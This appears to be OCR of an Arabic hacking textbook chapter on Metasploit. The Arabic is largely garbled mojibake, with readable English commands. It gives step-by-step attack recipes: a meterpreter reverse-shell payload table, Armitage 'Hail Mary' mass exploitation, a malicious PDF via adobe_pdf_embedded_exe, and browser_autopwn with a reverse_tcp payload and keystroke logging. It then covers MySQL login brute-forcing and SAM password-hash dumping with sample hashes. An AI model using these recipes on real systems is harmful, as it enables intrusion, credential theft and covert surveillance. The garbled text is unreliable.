.lJ^JI j| jlki Jja l ^ > ^ j ^HiJ ^1 CjI jUaJI ajjj] show options ^ ^1^ .6 

msf> show options 

.<Uii ^I^V c*Ui j jlrk set J^VI ^Vimi .7 

msf> set option_name desired_option_input 

cj^Jl ^ exploit J^ul exploit ^^Luj .8 
m AiA & jajixJI ajjuLu/V! payloads j5£i c> ^ lk*' j*^' t> 'Metasploit ^l^i^l a^jSI ^LA J)!\ 

jUlkl ^£ ^>iklujj U I j^U j 4 JaxJI *^-Oj 6c_jjtaVl j ^ULi^aVl **J^ j (J'^^J ^ cJ^j j& VNC ^ 3^ 

.ilalS ^ Jjj^JI Metasploit /^^Vl payloads ^ 

V jl jikVI jfi^J jj liA . payloads j exploit 3iA^« j £ J^- s Metasploit cjU^^i s^i j 4 j£ii> 

^ AijlU payloads ' A m >f^ l^^c-l j^*^ Metasploit ^U^j ^il Uui t^jj^JI ^ ^j^aj 



Metasploit Payload Name 


Payload Description 


Windows / adduser 


Create a new user in the local administrator group on the target machine 


Windows / exec 


Execute a Windows binary (.exe) on the target machine 


Windows/shell bind tcp 


Open a command shell on the target machine and wait for a connection 


Windows/shell reverse tcp 


Target machine connects back to the attacker and opens a command shell (on the 
target) 


Windows /meterpreter /bind tcp 


Target machine installs the meterpreter and waits for a connection 


Windows /Meterpreter/ 
reverse tcp 


Installs meterpreter on the target machine then creates a connection back to the 
attacker 


Windows /vncinj ect/bind tcp 


Installs VNC on the target machine and waits for a connection 


Windows /vncinj ect/ reverse tcp 


Installs VNC on the target machine and sends VNC connection back to target 



.Jj ^ul l ^Jajl ^ U jjc. j <OS X 'BSD 'c>^^ J-j xj& ll I g joi j payloads ^ 

[windows/meterpreter/reverse tcp] j [windows/meterpreter/bind tcp] lS^ ^JjI^ payloads u^? 
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Bind Pay loads 



exploit J-^jk lp^ 'bind payload ^ - 

1} Exploit exploit J^j^ f>>^ ^1 4 JUl<J! 11a ^ . jtg^JI j-* lJ^I J] JU^il 

Attacker ^ Target 'exploit JL">j] ^ U ( J-^VI jkuj cJ^Jlj lJ^13 

2) ConnectiS ^ 

o^j^ u^j exploit lUjS ^ ^reverse payload ^ - 
Reverse Pay loads t> ^ ^ .^W*^ <-£ s JL^jVI l^^i^II jl^JI 



1) Exploit 



Attacker ^^^^^^^^^^^ Target 
Z) Connection 

jl Meterpreter . Meterpreter jA U^V lW^JW Metasploit Jjkij diia. Metasploit c> & j^ 3 
'Meterpreter . Metasploito* u^j Au 3 ^ W^* 2 £^ ^1 sbi g-A Meta-Interpreter 

s Sjjix jaJ .^i^A Jc-lisll l^t^iuit ^jSai ^1 s^USl! j^l^JI ^^Saxj ^ill Metasploit payload 
C5 ic ^cLoij c ^j3I ^r-iui3l j* SaiU tiLj£j]| )1a jSjj .l^j) < . iL^all (j-ajil! - iklujj Vj ftjStilt ^ i^ASlh J-axj 4jI Alaia ^a Meterpreter 

^jjj l^jli c ^ja^al l jl^a. aIijjj .Linux /bin/sh J Windows cmd.exe ^j^? Meterpreter ^Uaj 

.l^SI jlkl ^ill jJU <j jjLJ! Cj! jLjiaV! ^ Meterpreter J^-^ 
^jLd j^l t" niigrate " j-**^ ajjujLojVI < la jll J-dJii .Ujjaljjal l^ja ciinj ajuIjII CjI j^l ^jaxJI I^j^ Meterpreter 

C^^>^1 ^-S^J J g ^ ^ C5^^J c k > ^ ^-ia^j ^>f^ ^Ld^Jl c ql'qjl JL^. .L$^)^ ^J^ T ^ ^a^L^Jl 

" ^1.^ n>il .^.l^xJI ^ ^ ai mi tt^^jjouJI jl^aJI l!^^ j' ^ ( ; ^ >>1 ^ " download " 

.^tlajjudj cjliLi ^^ic lIjIjjjaj ^Ij^V " edit " iklujl (j^-AJ .< a>^1uiaSI jl^aJI ^ig-xJI djliLJI Jill " upload 

.AjLaJI c-ia jl I^I^IojI "kill " jl ^ t^ixJI J^J^ lU*^ I^jI j 4 jJ jIa^V " execute " ^I^a^l 
shutdown " '" ps " '" Is" '" cd " ^ uj^ ^ ia^jJU UJa jl! ^ jajjj s^Lc Ijaj! ^ j^l jVl 

." ifconfig " j '" pwd " <" mkdir " * M 

.l^^JI Jc^UjII jji^l^l j^-dj C5 i^j3l j j JjLoj j j^ j Meterpreter J j>^^1 tjjjj U£ 

is* post exploitation Meterpreter c^j ^ j* 1 ** .c#^ J ^ sbVl ^ ^l^ki^l Ai ^3 j ^3-^5 

.4 0 jU^ti 
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MASTERING ARMITAGE, THE GRAPHICAL MANAGEMENT TOOL FOR METASPLOIT 



L_fllkJI Ajlgj ^ Jx^j -uV ^ ^liia jl .(Armitage) £^ J j • 



i Metasploit c> ^1 



^Wj 'Metasploit ^a^lt <j1 .Ujj^j c*U CjUjIxJI jjsjj Cf- <-J$^i MetasploitJl tsLl^iual 

cjSj ^ Meterpreter <^ jt Metasploit ^ j t> d ^ <W ^ 

http://www.fastandeasyhacking.com ^ s ^bVI 6^ jo ±yA\ u\ j3 ^ ^ 
Start I Kali Linux | Exploitation Tools | Network Exploitation Tools | Armitage 



t^jl, Accessories 


> 






40 ELectronics 
^|f& Graphics 


> 












Internet 


> 






KaLi Linux 


> 


Top 1G Security TooLs > 


Office 




Information Gathering 




f$ Programming 


> 


Vulnerability Analysis 




|jpl Sound Sf Video 


> 


0^ Web Applications 




%Q System Tools 


> 


Password Attacks 




Universal Access 


> 


Wireless Attacks 












Exploitation Tools 


> 




rj|J Sniffing/Spoofing 
Maintaining Access 
ll? Reverse Enc 

□ rrnitage 
S Hardw estpLoitG 

Forens ikat 
j[J Report jbo££-autopwn-Unu> 
*(fj[ Systen jboss-autopwn-win 
termineter 




C| BeEF X££ Framework 

Cisco Attacks 
fit Exploit Database 
4QI Metasploit 



Network Exploitation 



fSl SociaL Engineering TooLkit 



[LDCGDDES 



the mere you are Able to hear 



:connect jj j£\ J ^ -1 



Connect. 



Host 
Port 
User 
Pass 



\L 27. O. 0. 1 



msf 



[ Connect j [ Help j 



ml J&m V . y-MI ^^Vl siaU ^jj ^cj^j 11a ^ .Metasploit h JL^^U Cj£ jll g\Z±A jl J^Ioij -2 

:yes j*' 'Start Metasploit? o\j**l\ ^ ^1 ^ . J-^VI ^ IjjIS ^li^J u' Jjj^ ^j^j 



o 



Start Metasploit? 

A Metasploit RPC server is not running or 
not accepting connections yet. Would you 
like me to start Metasploit's RPC server 
for you? 



I No j [ Yes J 



https://www.facebook.com/tibea2004 



306 



:(4JUUjj^I^G<.B 

.A^iSa^l cj!^ j3I ^jli L^l 6ja jlJI SPACE fhV^U cj!^ jll ^ d^JI *j .tajlm &a*JI cj!^ jll 4lki<JI ^ o^j*l : A 

.c fl^Jj JjJa Uj^3 ^jII exploit lS^»-^ ^5-^ UJJ^ LP^ cs"^ ^ lajuHll tilal^Al AlkixJl q^jsu ;g 

l*Ja jpj l^LLij fjJ CONSOLE £A-y*l* jl Meterpreter <> ^UJJ Metasploit <> ^1 tola!*!! q^jju :C 



Arm! tag e 



Armitage View Hosts Attacks Workspaces hte'P 



*• liB auxiliary 

* LB 1 exploit 

* (lii pa\ioad 
► A post 



A. 




_J Console X~"|_ 



= [ metasplolt v4 , 2 , 8 - rele ase rcore : -4. 2 api ; 1.01 

+ __ --=[ 8G5 exploits - 450 auxiliary - 135 post 

+■ -- --=[ 2^6 pdyladds - J7 pre odpr s - 3 nop s 

=[ svn r 14805 updated 177 days ago (2012.02.23} 

Warning; This copy of the Metasploit Framework was last updated 177 days ago, 
We re come nd that you update the framework at least every other day. 
For iiTa rndLion an updating your', copy of PIp Idsplo it, please sees 
https ; .//community ■ rapid7.com/docsyDOC-1386 



. JtiajSil jit) J armitage >Al ^ j* £^jl ^> 



a£jJo3I ^j^a^il ^IIiajI ~ iklmj tVjl .JIacVI Lpaxjj ^LJS ^IjsJI Jl ;Ua^A C5 ic exploit ^ i^LujI ^ c.aJI ^ o^-^ cjl cJ^ 

/ULsil Sjj^t ^ > l-S " Quick Scan (OS detect) 




intense Scan ■*■ UDP 
InCenie Scan, -all TCP pcrt-s 
Intense Seen, no ptnq 
Ping Scan 
Quick Scan 

Quick scan. <os detect) 
rit omprehensrve 



Running a Nmap scan from Armitage to identify targets. 
<> pl^VI .o-aili IP 6^ J IP £^ ^ " Quick Scan (OS detect)" j^l ^ 

."Use Attacks Find Attacks " exploit Jj^ cjUAxj 4^ ^Jl^j 
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*■ ijH e^plort 
H fife pa'yfo-ad 

H ft post 




Scan Complete! 

Use -"^ta cks-:-f m d Attacks to suggest 
apphcsble ewplarvs for your (anger s. 



L21J 



Screenshot showing Armitage has identified a potential target. 

jj Lg ic jiil AJal i ,111 tljlA jLa-j)/ .exploit (>" OtjsJI (jiUaV jl H'nil ^jJt liljli tJaVl j M aja - li^A ^lil^jl .i-la. LalUa 

: JSili ^ ^ _^ US " Hail Mary" ^ ^ o- "Attacks" 



A ^ x Armitage 



Arrnitaae vie^r Hosts 



(workspaces Help 



* (iS auxiliary 

* dm exploit 

* ft payload 
+ Bposfc 




Running a Hail Mary with Armitage. 

jl^j^alj JjxjujjH stal IaiLuj .l^^JI ^jja exploit el) - * lA^ j^ 3 J^jl c5^1 ^^^j^ <-!*^ Hail Mary ^juJI 

^jlj ^IIiajI (ji£ <L^.j>JI 'sjj^ 1 u ^ j .W^^j J j^ 3 lj* all (progress bar) ^ifril -^j^ ^ 

^1 ^vim^ l cJ^SU <L^3I cjli exploit l£ lUj^j Metasploit exploit Nmap gfta -^jj 

Jjljlkl ^-llLdjI ^jl Ci5 -istj ^ cJ^ 1 c^C' ,>*^l * ^.i^a ^il L_fl^JI lil ^IIlgjI <jaiUjj ^ <iL ^aLkJI l_a^J! <J!Laj 

,Asu ^jc Jjuj Cj!^ L_fl^JI Jjljlkl ^^Ic <JHg ^Ull (J£joJ! .L_fl^JI 



An™* -age' S!Vev« ±f4>-£*s- ^ttacJcs- 




Armitage success and three remote shells. 
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j^3U (_3^^ a CP" J J> ^ lS-^ ^J^T* jl (jiajc til&aj 6<Lu^a3I exploit L>* ^l^l^l ^^^J^ ^^"'1 ba-^C- 



w * Armit/Kjc- 



Armitage View Hosts Altacks Workspaces H.etp 




Interacting with a remote shell through Armitage. 

j-^j*^ J^t-^j jliuaV ^ ^ujjjjoj 11a interact" tjj* c j*' j*^' lS^*-^ j ^^ic J jj^a^Jl 



MASTERING THE METASPLOIT CLI (MSFCLI) 



*bl JaJ <> c T JkL Metasploit . Metasploit CLI (MSFCLI)^^ ^ ^ 

^ J£Jl> I^jI lUxj Jj exploit Metasploit ^ j j* <Jj jll ^ Jlk j^MSFCLI j 

LSaji Jasu 4il liul ja\ jVl Lpasu L-fll u&U Liajl i^^Jjoj .Sj-a j£ ^ Jj^i ^ iaitt cil&aJ 4jI MSFCLI ^I^jujI ^uUJjll lJ^JI 

^l^kjjojl Jaj ^ lS^*-^ iS'^ exploit laijJaJlj L_fl^su ^jl 4^ tlj^l .MSFCONSOLE c> JJ^ jSSI ^ j ^Ula 

.exploit c> Metasploit hh* 1 oA 3 ' 3 ^ < c> J*^ J j .MSFCLI 

:^ MSFCLIJ >itjS» u^u 
.MSFCLI J ^ exploit ^ >>VI li* :msfcli -1 

MSFCLI ^ o^^s :msfcli -h -2 
exploit ^ lS^I c> ^ :msfcli [PATH TO EXPLOIT] [options = value] -3 



c^jl! ^> ^ c3>^ bA jV jf^U (# k2ll ^ . j^Vl Metasploit CLI (MSFCLI) ^ 

^jj lJjjoj <^.H<JI exploit c> 'MSFCLI Jj*vi ^ <ji 1 > ^jI ia^.V .tSL (j-aUJI ^IkJI a^jjoj I^Uu^l 
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MSFCLI Jl sjel— II cjUL ^ jc - 



root@kali:~# msfcli -h 

Usage: /opt/metasploit/apps/pro/msf3/msf cli <exploit_name> <option=value> [mode] 



Desc ription 



dvanced 
]) tions 
heck 
xecute 
el p 

DS Evasion 

ptions 
i ayloads 
i ummary 
i argets 



Show available advanced options for this module 
Show available actions for this auxiliary module 
Run the check routine of the selected module 
Execute the selected module 
You're looking at it baby! 

Show available ids evasion options for this module 

Show available options for this module 

Show available payloads for this module 

Show information about this module 

Show available targets for this exploit module 



multi/handler payload-wlndows/meterpreter/reverse_tcp lhost=IP E 
auxiliary / s c a n n e r / h 1 1 p / h 1 1 p_ v e rs i o n rhosts=IP encode r= post= nop= E 



o^j*^ A ^j^j .Christmas Tree Scan f ^ 'ye^j^ u^j*^ t> 



root@kali:~# msfcli auxiliary/scanner/portscan/xmas A 
[*] Initializing modules .. . 

Name : GATEWAY 

Current Setting: 

Description : The gateway IP address. This will be used rather than a rand 

om 

remote address for the UDP probe, if set. 

Name : NETMASK 

Current Setting: 24 

Description : The local network mask. This is used to decide if an address 



in the local network. 

Name : ShowProgress 

Current Setting: true 
Description : Display progress messages during a scan 



M mm 



Name : ShowProgressPercent 

Current Setting: 1G 

Description : The interval in percent that progress should be shown 



( . lilaj to^lc j 4_jjUlkl djl jLikJI ^jAxJI ujj <J jIaj exploit ^ 4-^11*31 cj! jL^JI 

exploit ti^-M J ^j^i3 ^li 
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msfcli auxiliary/scanner/p 
[*] Initializing modules... 



■rtscan/xmas S 



Name: TCP "XMas" Port Scanner 

M o d ul e : a u x il i a r y / s c a n n e r / p o r t s c a n / x m a s 

License: Metasploit Framework License (BSD) 

Rank: Normal 

Provided by: 

kris katterjohn <katterj ohnfagmail .com> 



Basic options: 



Current Setting Required Description 



BATCHSIZE 256 
INTERFACE 

PORTS 1-100GG 
RHOSTS 

SNAPLEN 65535 

THREADS 1 

TIMEOUT 500 



The number of hosts to scan per set 

l he " a fif?!.! h !. 1 " t9 :i a " ™ HUE 



Ports to scan [e.g. 22-25,80,110-900) 
The target address range or CIDR identifier 
The number of bytes to capture 
The number of concurrent threads 
The reply read timeout in milliseconds 



Desc ription : 

Enumerate open | filtered TCP services using a raw "XMas" scan; this 
sends probes containing the FIN, PSH and URG flags. 



J£ .exploit is* ^ jW^' .0 f-^jil f v^ .. n c jaJa ^exploit ^ WiJt cj( jU^JI <xjIS j*1 

Jjjj <jjHaxJI (jiiljUaJt o^*^ ^ (j I * ; .(jpUaVI i^c- e><^& V j!) Cj!jUaJ! * alia a <c a I&j^J exploit 

<jl£ lit .^gjJaljjal <J^-^ 1 ft ^aJJ <JjlSaxll CjljLiJl £yz AjAslII ^jl Ja^^Lui tAJUll Sjjj^II (j-a .exploit ^-LgjoJI ^aJJ ^jl 



#msfcli auxiliary/scanner/portscan/xmas O 
#msfcli auxiliary/scanner/portscan/xmas E 



;E <*-^ tliul exploit ipsl 



METASPLOIT ABLE MYSQI 

.MYSQL j flv^mU MYSQL djUUJI sa&IS ^U. Metasploit fl.v^ml t LS&Loij jju> t^jaJ! 

- iklujj ^Sl j-<JI ^ ^jaxJIj ^WordPressj Drupal ^ '^j^VI aSliA C5 ic jjUaII ^ ^IJaixJI diULJt sacUs 1$j j£ 

.Metasploitable MYSQL ?j^ ^ li» UWj I .MYSQL ^UJI sjbIS LJU 
(j^jj JLw jjII ^ msfconsole >»VI 4±S <io^ <>■ cJj*-^ <»j»j metasploit Jj*-^i CjU-U ILL.. US -1 

.metasploit J^^l <-%^-j> c^ 1 
.search mysql j-VI f l-iii-U ^ij MYSQL m Cil.ia.jll 

i^VtS MYSQL ^ j f'^^j f -3 



msf > use auxiliary/scanner/mysql/mysql_l°9i n 
msf auxiliary [my sqllogin) > 



.show options ^IasJjuL ^ cjblkLJI jxi ^jij -4 
.exploit ,>*VI ^l^klujlj ^ j^Jl (jj^j ^2 cAJIalall £>i& aIacU ^ jis -5 



METASPLOITABLE PDF 



Adobe (PDF) ^j-a-Jl 



j^iuiii ~\ iLixJ j ^ IVIetasploit iaJLuj| 4 jqft < ftju^imj l_s jjuj t^.j>^JI ol^ 
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. JU* jSll ^ msfconsole JjjL c> metasploit J^i? ^ -2 

.search pdf j*VI CP pdf c^Jb jl> -3 

:EXE Social engineering c> V U> PDF P b^i-l -4 
use exploit/windows/fileformat/adobe_pdf_embedded_exe 

exploit cjLlkiJI j*J show options ^l^ki^U ^ j£> ^ -5 
.INFILENAME j FILENAME c> l£ £±j ^ v\ ^UlkUl i^^U -6 
.43L5SI ^ ^ill PDF ^ c> FILENAME j^s ^ -7 
.<J^l^U aJIJ^j 4j J ^1 ( M L^ jjdl) PDF ^ gij* c> INFILENAME j^j -8 
set FILENAME evildocument.pdf 
set INFILENAME /root/Desktop/willie.pdf 

.exploit ck> t> EXPLIOT ^ fS -9 

Uta . jiL^ Meterpreter ^ PDF ^ exploit J^jVMSFCONSOLE U*^U « P jaJI 

c^t j 'exploit c> V W> EXE PDF jtj^l ^ PDF ^jJI t> j ^ j ^plL] J^k <> 

PDF ^ Metasploit .exploit ^ ^ ^ U*_jja j <PDF ^ ^ 
^ ^jIjj Jaxj Meterpreter 'PDF .Windows Reverse TCP c> payloads 

IMPLEMENTING BROWSERAUTOPW? 

^j^lh tsU ^ ^1 Metasploit c^ 1 (auxiliary module) s^L-JI s^j BROWSER_AUTOPWN 

J\ JjS JjajJI ^ ^^Ikl^VI A-iLoc iaL BROWSER AUTOPWN .M^' ^ ^ <Llunj aJI 4<Ljk> ^ujJI jt^ 
La t^i^LJI ^ > ^il bllLojl _7 jjjV u>1 ^) t — ^J-"] ^^alo AjJa jfijjla ^tajj-a (jljlkl J j^-^ C^ cs-^S ^ J & J 

. j^ill exploit J^i 

. Jlia jjII msfconsole j*VI JjjL jc metasploit J^^? ^ -2 
.search autopwn j-^VI J^-al (Jjj^ jij -3 

BROWSER AUTOPWN -4 

use auxiliary/server/browser autopwn 

Windows Reverse TCP ^ ^ PAYLOAD -5 

set payload windows/meterpreter/reverse_tcp 

exploit J^-^ cjUlkiJI lP 3 ^ show options j^VI ^l^i^U pjfa -6 
. URIPATH jLHOST c> & t^j ^ ^W^i c> -7 
.^m^rlt JL-a3Vt pI j^j eij^ ^ill lJ^SI ( L^Jj IP jl c>LHOST j^s <"u^ -8 

set LHOST 192.168.10.109 
set URIPATH 'Tiletypes" 

.exploit ck> t> EXPLIOT ^> ^ -9 

http://[Provided IP Address]:8080 cPjj^VI IP c> exploit ^ Metasploit-10 
JU ^ .d^ixj session ^^ki^JI JL^jVI J jUj browser_autopwn *^ jll j^^ jll jjj^ -11 

;^U3I j^Vl ^^IujI ^session Vij . Vnl . JL^jVI 11a ^ ^Jaljj Meterpreter 

sessions -1 1 

.help >aVI jl^-al Meterpreter j^lj 4jjJ-12 
;^ciilLJI (j^xai l^fj c_a jjoj 6<!LaJI ^ ,6jfl j*\ jVI <xjIS ciltiA -13 
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keyscanstart 

.keyscan_dump j*Vl uj^ j t> UiUJl ^ ^1 keystrokes J j^^ -14 

d^JI j ^i^ill ^ j jplk] J^Lk t> Uta .exploit browser_autopwn lP^VMSFCONSOLE 4* jaJI 6 i* ^ 

^ ill j $windows_reverse_tcp i> payload ^autopwn s^j autopwn ^->l^j o& 

A3 session ^5-^* l)> * clp^ ^-i^jall SjUj ^j^j (j^j^^ l^j ^ ^^Ac- J jj^a^il U3 ^jujj 

.ilajfc Meterpreter 

tillij t&^V 4j (J-aIa ljU£ f y±l\ j jij ui j-uu cin^ f J£ (jduJ <iSJj metasploit o^^l u-* U^D) ^ 



CRACKING PASSWORDS 5.3 



' [cracking password] cjIaK jju£ ^1 4illL^31 CjI jia^JI J^lk j-* ^ .a^lj S JjljlkVl (j**^ o> lA^ ^ 

< [hiding filesj^^^ ' [executing applications^*^ cjULnkill j 4 [escalating privileges] cj! jUl^VI j 
ij i^j] t^a^j l£^>^^ j cjI jiaaJI <jaiaLL<J lL& jll ^jL^. ^jVI .JjljlkVI j^-A^ ^j^'j 6 [covering tracks] iIj^aII <.ila*jj 

# jjoJI t ** &3£ jjoi^ Vjl ^.l^xJI (JjL^j t^Uaill ^jljlkl aJjL^xj ^ .^Uaill g &li Jjljlkl 

j| ^istaj LaC ^jAaill ^jiasu .^JjoAI ^jjoi^j ^JjoAI t ** )1 &l£ 4.uiflii<<i (jj^ Aix-a^lll CjUjajLajl (JlLd ^ JJ^a ^ 4_xjo3\_Lq jjj^alij ^jl L_lxj^al! <j| 

^alj U jCO 4 jUjcVI ^ £xa .^Aalll <J jj^ jib ^-UijaJlj ClAjLJl AjLa^A ni J^Aall <JAaJ JjoJI t - il j^jj tlixi^J 

„ JjuJI Jjo£ CjUjajLujl ^.ilasul JJ > ^ L_flli!i3l 

^1 ciLJ (JjjJ ^jl c LSjj^j 4 J Jj> > >n Asu (j£3 j L^^JI ^Uaill (JJ^ L>^J^ !c5^"^ J^JI ^ .^'j^^*^' 

du£ ;til3i ^ I jjojIj l * a ^^ CjI^I^xJIj djlilxJl ^ <jU^3Ij S^ljlll ^^Ic j^la jjc. Cl±£j IaC jlaill .^Uaill l^A (^Ic (Jj^- 

jl [user] o (jj-ali} CjI jLiLdl I^j^I l. it > ^ ^^Jc <J ^^\\ Aic Ullc. JL^JI 11a .aja^. ^<ilj^)j ^1 cIujjj C5 Jc j^la j;ic. 

.[guest] 

Aj j>J CjI jixkl! (J* AjAslSI liijj C5 lc Dj^Ui (jj^J (jla t^jji^ ^1 4_u3 ^jjjJ jl JJS J jj^a jll 4jJ ^ill l_jLlu^JI (jl^ lij 

^1 <J jj^ jll ( . lllaJJ (jl jlkVl jt-iikl J*^\ (^t* cJ-^ ^— J ^ (j -0 ^'^*A^ ^— jt_iL<iVI AcIj^J j JjuoII Cjl Jju^ ^ ; Ujuj 

?(CRACKING PASSWORD) j«J) j«S > U 

(j^a^iJ! <j^k-<JI jl jj ^Uaj (Jj^ia (jc l^ikj ^1 ^^jll djUUJI ( ^ <^ o^IxjjujI 4 )\ac. j& Password Cracking 

^Uaill ^jjjoi^ JjS ^ cP^j ^^J^!^ 6L - J ^ L - J ^ ju ^ ^ ^ o^IxjjujV - jkiud^ll o^cLoixi (jj^ii Aa Password Cracking 

CjLq jIslaII ajjoujj <xJa3 c _^a jjoJI CjIaK .Password Cracking jju^ CjV i^fi <jj^aji3l cjV ^ ajaxJI 

<j ^ j^i* Jj^ajll Password Cracking cjli&i tj^ ^imj j^l^JI ^ia*^ jli t^-MUj .^Uajll Jj^jll ajjjj^I 
.brute-force method^^ ^ j^^ s- 5 J dictionary ^ ^I^IujU jl Uj^j jjuJI CjUK jjo£j aS ^IkJI 
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PASSWORD COMPLEXITY j*-M al^fes 
^ill ^l^JI jj^sJI c*Ui .cjU^SI ^jja ^Vl j I jj^ s 1 *^ (Password Complexity) 

a! j$ > >n <jJajC iaJjoJl JJ^>^ ^ (j! L— Ll^ A LaJjuiJ JJJ-aJl (jj^J VI < ; J . s-Luij] £.UjI AjusjJa ^LqA^LuoaI) ^^ic 

Passwords that contain letters, special characters, and numbers: apl@52 
Passwords that contain only numbers: 23698217 

.Jala ^lajl C5 ic- ^ jlaj ^jII jjj-<J1 djLJ£l JtLa 

Passwords that contain only special characters :&*#@!(%) 

Passwords that contain letters and numbers: meet 123 

Passwords that contain only letters: PUTHMYDE 

Passwords that contain only letters and special characters: bob@&ba 

Passwords that contain only special characters and numbers: 123@$4 

a jjj^2l CjIaISJ IjJjj^j ^Jjia j JJLuuJl Adai\ AiJLua^a ^JjjL ^1 ^Jjialj ufl j-uj JjS j i (J l^\ CjU^^L^ 



_ (djUjiij jjuJI j ^)jjl^)3l) a£jjuo3I j t (JOS > hj > nj t^jjo^jJ t jjAbj) (Jjt_Ju3I 4 AiajV C**^ 1 ^ 

SAM Database 

s Vn . n^ l ^ ^ (Encrypted Password Hash) s jLUI jjj^^ cjUK ^Ia J^-^^ 

.(SAM) o 3 ^ l^W^ olp^ ^ 'Windows 

cjULo^ SjbV Jj^jj c> ^^i^ .Security Accounts Manager database J ^ SAM s^&lS 

1^1 jjuJI cjUK ojJ^j flj V ciii^ .(^.Ij dUjI c^li) (hashed format) u^W^ ^ ^jI^j ^ ^" . n^ t 
. (registry file)c£ j^^j Uiiiii SAM .CjU^JI l ^nU^ ^iJ o^l^SI lS^> ^ j^ 5 ^ .c?^l 

jLuJI SAM t^j ^311 cjI jl^aVI j ^2000 Jj^j ^ ^ ^ Windows NT c> *-JaVl 

^> jj^J! cjUK JiU ^1 ^UUj 6 SAM^Ji ^ Ua^i J axj jV! .(C:\Windows\System32\Config\) 

AjaLiaVI ^Ij^Jl ^ ^ ^ ^ diajjoj jjljU tha. ^UlgJl diU jlx-<Jl (jiaxj Ja^j SAM <■ aUll (jV J .L^UI 

.^^xll Jjli jj£ j J^l£ SAM <■ «M j^i>.^ ^ 6 cJ^^ I^a AiLjaVU .SAM ^ aLll jl ^ia SjjSSI llul 

jjL^J ^^Ic (J^Jfl 4L_fl^Jl ^Uaill ^^Ic (Jj^J (JjxjujJ ^Uaj a I iklLuji <Uajudl „ (Live OS)^^ l!^^ (Jj*jujJ ^UaJ ^I^JjujI j& 

L_aLJI J jj^a jll ^ jij^i UJ^J L>^ 1^ V JJ^JJ Jj*juSjll ^Uaj jV ^ .SAM ( aLJ] jjlbjl! (jiJu 
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^JAxJl ^jJ t,baJ| (jjoi^J .(>ilgJl J jj^a jll Sbi J>lkU <^U^ 'SAM * aLqJI Jl JJ V a-i-uabU .SAM 

.4 qVl^ a CjLljSj ^l>lkj uAj (j^ajsll Jc SA1VI <— fil^I) CjUjI^ a ^cjudj (j^J ^ajl .^^lc- <j^aj Jl A l^JJ J (Jjjlg-ll Jl <J J^ J^ J l J^VI 

SAM (IMjjII s^li o*l ^ Windows NT 4.0 Jj--S3M ^ SYSKEY "^jCAj^ jjljU 4£ ^ jc 

ftlaj J jSl^JI «Ub ^ v^..n Jll (SAM) cjLLu^JI <>! jja^ jjj* cjUUj s^&IS cjU jl** J^ SYSKEY Stal ^ j2 
IgJ ^ jjLJI ^ jl^j .4.0 J u) jj^j J ^Lte^' SYSKEY ^bl c^lS .ciu 128 j^j^I ^Ui* ^vimi Jllj jj^jj 
JjjIj 4_ii^<JI 4£jJa3l Jkb Jjl jlkVI djl^aA (j-a 4_jIa^J3 (SA1VT) djUljud^JI ^j>»l jjj^ 4 ^ L - J ^^ s^c-lS CjU» jl*.* ajL^j ^ Jkl <jl 
sbVI J SA^I &j*^ J^BindView el) -0 J^^ l^j^ (* 1999 ^^^^ J tt^Ui ^ j >>ii j3 J^ ^-^l CjLg jlx-<JI 
jljlkVI ^jjj li& j . cryptanalytic*- 5 ! j^JI cJ^^ *w o^*-* ^ j^ ^I^IujU ajI^JI a£jJo3I Jkb Ja. jljlkVI ^j^uJI 

.s jLUI CjUUJI s^clS J c-kxjja ^\ L-fl^laLj ^ill brute force £ jj c> 
o^-'j 'Syskey Bug' ^^ >>1 J |>1 cJ^ ^—^j^ J^l 5J£ju1a1I ajjjouI BindView l^j* ^—^ j*- 43 jj-M-^ ^— " j^ 6 ^ 

.cjlSljikVI c> ^ jj c^l Aj^aJ J^JI 5-Lol Syskey sbVI <J ^ 

L-lau ^ll (j-a J-^J Uu» 4^.1 jll dI^jVI djb (Jjjl^-!l f\ laJLujl j ^jjILJI jjQ-^ ^aJJ tcJ^^I lP 3 *^ l)^ (>< ^..J^ ^ L_flLau£l jl J^- 
.(Jjir.Jull ^aUaj A a i nill S^Aa^Q jjLujjII (J»^J ^jjIj ^"liiLd l^J^ Cjljl^j^aVI <aa J 1 1 - taJl .6^)jai£ 

Jj^ill o^j ^ ajI ILU UB US (j^l j (%SYSTEMROOT%\system32\config)j^l li* <> ^1 ^ 

. Jaxj jjAlij JjixjaLill ^Uaj UJUa A ^ udj jl Aj^IjS jl Aj3 

http://technet.microsoft.com/library/cc723740.aspx 
http://en.wikipedia.org/wiki/Cryptographic hash function 

JL JL^Jl Jajj 4JI f UjIuiI jj (SAM < ^oti J Jj^> < in It CjUUj ^jaJL ^ jSj JjaLj JjLuoII ^Uaj ^1 ILLuj Ufi ;4ja j^La 

. (Active Directory)^^ J lj-^J^ ^ ^ Active Directory 
?(How Hash Passwords Are Stored in Window SAM) SAM <-ii^l J jj^l ^ lhU <jj>j ^ uLS -fc 



c : \windows\system32\conf lg\SAM 



Adidinfltrator:500 :598DrcE2€6()D3193J^ 

Guest:501 itfO PASSWORD*****"*** ************* *||q PASSWORD****** **********-***** : ; 
HelpAssistant!l00OBB99lAlDA16C539FE4l5844OSB9BElFFA::Ee3DBlAD7FDlDC98lF3«4l28 
SOTPORT_38B945aO: 1002:110 

PASSWOPsD**** **************** * ; F5C1D3814S5948F434C42AEE04DE590C i : : 
Hackers: 1003: 37035B1C4AE2BOC5B75EOC8D76954A50 : 7773COB920232397CAE0B17O4&fi4B78 
Admin; 10 04 :N0 PASSWORD** ********* * ********* : jjo PASSWORD********************* : 
Martin: 1005 :624AAC413795CDC1AAD3B4 35B51404EE:C5A237B7E9D8E708D8436B6148A25FA1 
JOhn:100€:624AAC4137 95CDClFFl7385FAFlFFE89: 3B1B47E42E0463276E3DED6CEF34 9F93! : 
Ja5On : 1007 : 624AAC413795CDCl4EB35FlCD90F4C7 6 : jSF585FFSFF€280B59CCE252FDB5D0EB8 i 
j5mitj s |l0^^24AAC413795CDCl4EB35FlCD9QF4C7 j a ^F585FFBFF€23 




3985BF: ; 
63604ES: 



User name User ID 



y 

LM Hash 



MUM Hash 



(jjiiil ^^inirt l-jLuo^. J£ iaiijjj .Active Directory s^clS jl (SAM) ^^clS ^^klauJI Cj^^joj ^jj 
^ J£ .Windows password LAN Manager-compatible password JjVl : jj^ c> 

.Active Directory SAM j^ 5 j ^ 



-ujIS .LM hash ^^i^i ^1 jjj^I A&\ji* jj^ 3 The LAN Manager-compatible password 

u^j '^j^Vl ^UJ i^L^ ci^ul *^ .the original equipment manufacturer (OEM) character 

a^& .ESTD J LAN Manager OWF m ^ jjj-JI <^ OWF j»M ^ 14 lU^ J 

.DES ^al^lujU JJJ^JI 
